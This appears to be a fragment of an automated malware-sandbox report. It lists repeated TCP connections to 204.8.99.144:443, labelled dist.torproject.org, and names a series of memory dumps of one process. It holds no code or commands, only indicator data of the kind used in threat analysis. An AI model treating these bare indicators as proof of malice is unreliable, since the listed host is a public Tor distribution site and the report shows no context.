| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 204.8.99.144:443 | tcp | |
| US | 204.8.99.144:443 | tcp |
Files
memory/2104-0-0x000007FEF5B3E000-0x000007FEF5B3F000-memory.dmp
memory/2104-1-0x000007FEF5880000-0x000007FEF621D000-memory.dmp
memory/2104-2-0x000007FEF5880000-0x000007FEF621D000-memory.dmp
memory/2104-3-0x00000000022D0000-0x0000000002322000-memory.dmp
memory/2104-4-0x000007FEF5880000-0x000007FEF621D000-memory.dmp
memory/2104-10-0x000007FEF5880000-0x000007FEF621D000-memory.dmp
memory/2104-11-0x000007FEF5880000-0x000007FEF621D000-memory.dmp
memory/2104-12-0x000007FEF5B3E000-0x000007FEF5B3F000-memory.dmp
memory/2104-13-0x000007FEF5880000-0x000007FEF621D000-memory.dmp
memory/2104-14-0x000007FEF5880000-0x000007FEF621D000-memory.dmp
memory/2104-15-0x000007FEF5880000-0x000007FEF621D000-memory.dmp
memory/2104-16-0x000007FEF5880000-0x000007FEF621D000-memory.dmp